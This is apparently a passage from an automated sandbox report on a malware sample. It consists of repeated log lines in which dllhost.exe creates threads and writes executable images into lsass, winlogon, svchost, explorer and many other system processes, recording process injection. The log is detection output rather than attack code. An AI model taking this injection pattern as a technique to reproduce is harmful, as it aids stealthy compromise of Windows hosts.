                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26321BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe EIP: 74621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 75172A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E521BFJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3200000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28AF9060000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 21039380000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 114A6AD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 250E2CD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 34C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1DCBB740000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1190000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 3000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1060000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: C20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2E00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 7B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 28B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 12C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 24C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 22C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 1260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\OYhDdCWEikpCnKPWZKDgrCqBwvtTIutDxdfguKZyoULaUFfrcGALEGLbIssWxiPDeTkxcFW\qNibFGdjXpCifDnakDQhCyTvLBs.exe base: ED0000 value starts with: 4D5A
